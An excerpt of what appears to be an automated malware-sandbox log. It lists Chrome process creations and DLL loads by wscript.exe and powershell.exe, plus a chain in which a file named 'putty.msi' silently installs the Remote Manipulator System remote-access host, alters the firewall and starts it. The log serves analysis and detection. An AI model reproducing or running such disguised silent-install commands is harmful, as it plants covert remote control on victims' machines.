          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1828 /prefetch:3
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3092 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3092 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 85876F97EED0B7EDCFF1192CE7DC76A0
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" -msi_copy "C:\Users\user\AppData\Roaming\putty.msi"
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | Process created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
          Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.shell.servicehostbuilder.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ieframe.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netapi32.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wkscli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msxml6.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.shell.servicehostbuilder.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ieframe.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netapi32.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wkscli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msxml6.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.shell.servicehostbuilder.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ieframe.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netapi32.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wkscli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msxml6.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.shell.servicehostbuilder.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ieframe.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netapi32.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wkscli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msxml6.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
